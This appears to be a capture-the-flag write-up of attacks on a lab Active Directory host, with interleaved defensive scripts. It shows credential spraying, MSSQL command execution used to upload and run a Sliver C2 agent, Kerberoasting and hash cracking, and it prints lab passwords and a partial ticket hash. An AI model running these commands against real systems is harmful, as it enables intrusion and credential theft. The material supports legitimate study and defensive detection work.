We start out in an assumed-breach scenario with pre-existing credentials: `rose:KxEPkKe6R8su`. Domain: `DC01.sequel.htb`

## `rose`

### LDAP

![[Pasted image 20250203212650.png]]

```
Administrator
michael
ryan
oscar
sql_svc
rose
ca_svc
```

#### `ASREPROAST`

no love

### WinRM

not permitted

### SMB

- command execution? - doesn't seem to work

![[Pasted image 20250203212048.png]]

#### SMB Shares

Dumped all the shares using

```sh
nxc smb $RHOST -u $USER -p $PASS -M spider_plus -o DOWNLOAD_FLAG=True
```

- `Accounting Department` contains interesting files

```txt
[λ]- [Accounting Department]-> tree
.
├── accounting_2024.xlsx
└── accounts.xlsx

1 directory, 2 files
[λ]- [Accounting Department]->
```

- attempted to open both files in LibreOffice Calc and in Google Sheets; both applications claim the files are corrupt.
- none of the other files seem to contain anything interesting...
- I feel like I've exhausted most other approaches, so the way in pretty much has to be the `.xlsx` files.
- using the "Engrampa" archive manager I managed to extract `sharedStrings.xml` from the `accounts.xlsx` file. It seems to contain usernames and passwords.
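From the defender's side, the interesting property here is that an `.xlsx` is a zip and every text cell of every sheet is stored once in `xl/sharedStrings.xml`, so a share sweep for credential tables only needs that one member and works even on a workbook that Calc or Sheets call corrupt. The scanner below is an added example, not code from the original notes; the sample workbooks, header list and heuristic are constructed here with placeholder values (no credentials from the box), and it handles both a whole `.xlsx` and a bare `sharedStrings.xml` like the one extracted above.

```python
"""Sweep spreadsheets for plaintext credential tables via xl/sharedStrings.xml.

Added example for this writeup, not code from the original notes. Every text
cell of every sheet in an .xlsx is stored once in xl/sharedStrings.xml, so a
share scan only needs that one member: it works even when the workbook is
damaged enough that Calc or Sheets call it corrupt, as accounts.xlsx was.
The sample workbooks below are constructed in memory with placeholder values.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Optional

SST_NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
# Column headers that mark a credential column (case-insensitive, whole cell).
SECRET_HEADERS = re.compile(r"^(pass(word|wd)?|pwd|secret|api[_ ]?key|token)$", re.I)
CHAR_CLASSES = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")


def shared_strings(xml_bytes: bytes) -> list:
    """Return the shared-string table in index order.

    A rich-text cell splits its text over several <r><t> runs, so every <t>
    below an <si> is joined; a plain cell has exactly one <t>.
    """
    root = ET.fromstring(xml_bytes)
    return ["".join(t.text or "" for t in si.iter(SST_NS + "t"))
            for si in root.iter(SST_NS + "si")]


def sharedstrings_from_xlsx(data: bytes) -> Optional[bytes]:
    """Pull xl/sharedStrings.xml out of an .xlsx (a zip) without opening the
    workbook; None if the archive lacks the member."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.read("xl/sharedStrings.xml")
    except (zipfile.BadZipFile, KeyError):
        return None


def looks_like_secret(value: str) -> bool:
    """Password-like heuristic: 8+ chars, no spaces, 3 of 4 character classes.
    Names and headers fail it; generated passwords of the kind found in the
    writeup's table pass it."""
    if len(value) < 8 or " " in value:
        return False
    return sum(bool(re.search(p, value)) for p in CHAR_CLASSES) >= 3


def scan_strings(strings: list) -> dict:
    """Flag a table only when a credential header and secret-looking values
    co-occur; the values themselves are counted, not reported, so the scan
    output does not become a second copy of the leaked secrets."""
    headers = [s for s in strings if SECRET_HEADERS.match(s.strip())]
    secret_like = sum(looks_like_secret(s) for s in strings)
    return {"credential_headers": headers,
            "secret_like_values": secret_like,
            "flagged": bool(headers) and secret_like > 0}


def scan_file(name: str, data: bytes) -> dict:
    """Accept either a whole .xlsx or a bare sharedStrings.xml (as extracted
    with an archive manager in the writeup)."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        xml = sharedstrings_from_xlsx(data)
        if xml is None:
            return {"file": name, "error": "no xl/sharedStrings.xml in archive"}
    else:
        xml = data
    try:
        result = scan_strings(shared_strings(xml))
    except ET.ParseError:
        return {"file": name, "error": "not a shared string table"}
    result["file"] = name
    return result


def build_sample_xlsx(sst: bytes) -> bytes:
    """Constructed minimal .xlsx: only the member the scanner needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/sharedStrings.xml", sst)
    return buf.getvalue()


# Constructed sample table with placeholder credentials (not the target's).
SAMPLE_SST = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10">
<si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Username</t></si>
<si><t xml:space="preserve">Password</t></si><si><t xml:space="preserve">Jane</t></si>
<si><t xml:space="preserve">jane</t></si><si><t xml:space="preserve">Xy7pQ2mVt9Lk</t></si>
<si><r><t>Bob</t></r><r><t xml:space="preserve"> Smith</t></r></si><si><t>bob</t></si>
<si><t xml:space="preserve">Example-Pass-2024</t></si><si><t>NULL</t></si>
</sst>"""

# Constructed benign workbook: headers only, no credential column.
BENIGN_SST = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3" uniqueCount="3">
<si><t>Quarter</t></si><si><t>Revenue</t></si><si><t>Q1-2024</t></si>
</sst>"""

if __name__ == "__main__":
    for name, blob in (("accounts.xlsx", build_sample_xlsx(SAMPLE_SST)),
                       ("budget.xlsx", build_sample_xlsx(BENIGN_SST)),
                       ("sharedStrings.xml", SAMPLE_SST)):
        print(scan_file(name, blob))
```

The scan deliberately reports a header list and a count rather than the matched values, so the report itself can be shared with the owners of the share without leaking the same secrets a second time.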
```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
<si><t xml:space="preserve">First Name</t></si>
<si><t xml:space="preserve">Last Name</t></si>
<si><t xml:space="preserve">Email</t></si>
<si><t xml:space="preserve">Username</t></si>
<si><t xml:space="preserve">Password</t></si>
<si><t xml:space="preserve">Angela</t></si>
<si><t xml:space="preserve">Martin</t></si>
<si><t xml:space="preserve">[email protected]</t></si>
<si><t xml:space="preserve">angela</t></si>
<si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si>
<si><t xml:space="preserve">Oscar</t></si>
<si><t xml:space="preserve">Martinez</t></si>
<si><t xml:space="preserve">[email protected]</t></si>
<si><t xml:space="preserve">oscar</t></si>
<si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si>
<si><t xml:space="preserve">Kevin</t></si>
<si><t xml:space="preserve">Malone</t></si>
<si><t xml:space="preserve">[email protected]</t></si>
<si><t xml:space="preserve">kevin</t></si>
<si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si>
<si><t xml:space="preserve">NULL</t></si>
<si><t xml:space="preserve">[email protected]</t></si>
<si><t xml:space="preserve">sa</t></si>
<si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si>
</sst>
```

### MSSQL

- seems to be able to authenticate
- doesn't seem to be able to execute commands....

### Password spraying

#### SMB

```
oscar:86LxLBMgEWaKUnBG
rose:KxEPkKe6R8su
```

#### MSSQL

```sh
oscar:86LxLBMgEWaKUnBG
rose:KxEPkKe6R8su
# with --local-auth
sa:MSSQLP@ssw0rd!
```

## `oscar`

`oscar:86LxLBMgEWaKUnBG`

- SMB - nothing new
- WinRM - not permitted

## `sa`

MSSQL `sa:MSSQLP@ssw0rd!`

### MSSQL

### TODO

- [x] kerberoast - yielded a hash for `ca_svc`
- [ ] dump local mssql database
- [x] run SharpHound

**Command execution permitted:**

```sh
nxc mssql $RHOST -u $USER -p $PASS --local-auth -x whoami
sequel\sql_svc
```

Indicates that we got a local user account.
**We can upload a sliver-c2 agent:**

```sh
nxc mssql $RHOST -u $USER -p $PASS --local-auth --put-file ./GRUBBY_HARP.exe C:\\Windows\\Temp\\agent.exe
```

![[Pasted image 20250204124545.png]]

**Shell time:**

```sh
nxc mssql $RHOST -u $USER -p $PASS --local-auth -x C:\\Windows\\Temp\\agent.exe
```

### Internal Enumeration

#### Bloodhound

- shows kerberoastable users:
  - `ca_svc`
  - `sql_svc`
- `ca_svc` is a member of

![[Pasted image 20250204144156.png]]

#### Kerberoasting

**Manual SPN user enumeration:**

```
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select-Object Name, SamAccountName, ServicePrincipalName

Name                    SamAccountName ServicePrincipalName
----                    -------------- --------------------
krbtgt                  krbtgt         {kadmin/changepw}
SQL Service             sql_svc        {sequel.htb/sql_svc.DC01}
Certification Authority ca_svc         {sequel.htb/ca_svc.DC01}
```

Using [[Rubeus - TODO]] to extract hashes for the service accounts:

```
[*] SamAccountName         : sql_svc
[*] DistinguishedName      : CN=SQL Service,CN=Users,DC=sequel,DC=htb
...
[*] SamAccountName         : ca_svc
[*] DistinguishedName      : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[*] ServicePrincipalName   : sequel.htb/ca_svc.DC01
[*] PwdLastSet             : 2/4/2025 4:47:28 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*ca_svc$sequel.htb$sequel.htb/[email protected
```

Considering that we already have the password for `sql_svc`, we'll have a gander at `ca_svc`.

Attempts at cracking the hash fail:

```sh
hashcat -m 13100 ca_svc.hash ~/arsenal/resources/rockyou.txt --force --attack-mode=0 --status
...
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ca_svc$sequel.htb$sequel.htb/ca_svc.DC...0241ab
Time.Started.....: Tue Feb 4 14:28:30 2025, (7 secs)
Time.Estimated...: Tue Feb 4 14:28:37 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/noctua/arsenal/resources/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2152.2 kH/s (2.24ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 78c Util: 73%

Started: Tue Feb 4 14:28:29 2025
Stopped: Tue Feb 4 14:28:38 2025
```

#### Credential Hunting

```powershell
Get-ChildItem -Path C:\SQL2019 -Include "*.json", "*.ini" -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
# yields
ExpressAdv_ENU\sql-Configuration.INI:19:SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
```

```
cat Sql-Configuration.ini
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
```

We verify that the following credentials are valid:

```
ryan:WqSZAF6CysDQbGb3
sql_svc:WqSZAF6CysDQbGb3
```

## `ryan`

We leverage the fact that `ryan` has `CanPSRemote` (i.e. we are able to use Evil-WinRM). Nonetheless, we'll also drop a Sliver C2 payload onto the system and execute it as `ryan`.

- `ryan` has `WriteOwner` on `CA_SVC`, which appears to hold the keys to the kingdom.

![[Pasted image 20250204210915.png]]

## `ca_svc`

- appears to be the key to the mystery
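Looking back at the Kerberoasting step from the blue side: the Rubeus output shows `RC4_HMAC_DEFAULT`, meaning the service tickets for `sql_svc` and `ca_svc` came back RC4-encrypted, which is both what makes a TGS-REP cheap to crack offline and what the domain controller records in Security event 4769 as `TicketEncryptionType 0x17`. The detection below is an added example, not part of the original notes: it runs the standard "one principal pulls RC4 tickets for several user-account SPNs in a short window" hunt over constructed 4769 records. Field names follow the 4769 event, but every value (timestamps, client addresses, status codes) is invented here.

```python
"""Kerberoasting detection over Windows Security Event 4769 (TGS request).

Added example, not part of the original writeup. The Rubeus step above
requested service tickets for sql_svc and ca_svc and got them back as
RC4_HMAC (the "RC4_HMAC_DEFAULT" line), which is exactly what makes a TGS-REP
cheap to crack offline. On the domain controller each such request is logged
as event 4769 with TicketEncryptionType 0x17, so the pattern "one principal
pulls RC4 tickets for several user-account SPNs in a short window" is the
standard hunt. The records below are constructed, with placeholder client
addresses; field names follow the 4769 event but the values are invented.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"          # TicketEncryptionType for etype 23
SUCCESS = "0x0"            # Failure Code for an issued ticket
WINDOW = timedelta(minutes=5)
THRESHOLD = 2              # distinct user-account SPNs per requester per window

# Constructed sample 4769 records (not real telemetry from the box).
EVENTS = [
    {"time": "2025-02-04T14:00:10", "account": "rose@SEQUEL.HTB", "ip": "10.0.0.50",
     "service": "sql_svc", "etype": "0x17", "status": "0x0"},           # lone RC4 request
    {"time": "2025-02-04T14:27:55", "account": "sql_svc@SEQUEL.HTB", "ip": "10.0.0.99",
     "service": "krbtgt", "etype": "0x17", "status": "0x0"},            # ignored: krbtgt
    {"time": "2025-02-04T14:28:01", "account": "sql_svc@SEQUEL.HTB", "ip": "10.0.0.99",
     "service": "sql_svc", "etype": "0x17", "status": "0x0"},
    {"time": "2025-02-04T14:28:02", "account": "sql_svc@SEQUEL.HTB", "ip": "10.0.0.99",
     "service": "ca_svc", "etype": "0x17", "status": "0x0"},
    {"time": "2025-02-04T14:28:05", "account": "ryan@SEQUEL.HTB", "ip": "10.0.0.51",
     "service": "DC01$", "etype": "0x12", "status": "0x0"},             # AES ticket for a computer SPN
    {"time": "2025-02-04T14:28:07", "account": "oscar@SEQUEL.HTB", "ip": "10.0.0.52",
     "service": "ca_svc", "etype": "0x17", "status": "0x1b"},           # non-success status, ignored
]


def is_roastable_request(e: dict) -> bool:
    """Successful RC4 ticket for a user-account SPN. Computer accounts ($) and
    krbtgt are excluded: machine passwords are long and random, so their RC4
    tickets are not practically crackable, and krbtgt traffic is routine."""
    svc = e["service"]
    return (e["status"] == SUCCESS and e["etype"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect_kerberoast(events: list, window: timedelta = WINDOW,
                      threshold: int = THRESHOLD) -> list:
    """Group qualifying requests by (requesting account, client address),
    then slide a window over each group and raise one alert per group when
    the number of distinct service accounts hit reaches the threshold.
    In a domain where AES is enforced for service accounts, threshold=1 is
    the right setting: any RC4 service ticket is then anomalous."""
    groups = defaultdict(list)
    for e in events:
        if is_roastable_request(e):
            groups[(e["account"], e["ip"])].append(
                (datetime.fromisoformat(e["time"]), e["service"]))
    alerts = []
    for (account, ip), reqs in groups.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            hit = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(hit) >= threshold:
                alerts.append({"account": account, "ip": ip,
                               "services": sorted(hit),
                               "first_seen": start.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(EVENTS):
        print(f"[ALERT] {a['account']} from {a['ip']} requested RC4 tickets for "
              f"{a['services']} starting {a['first_seen']}")
```

The single RC4 request by `rose` is below the default threshold and stays quiet; that is the trade-off to tune against the environment, and the cleaner fix is to set AES-only `msDS-SupportedEncryptionTypes` on service accounts and move them to long random passwords or gMSAs, after which `threshold=1` turns any remaining RC4 service ticket into a high-confidence alert.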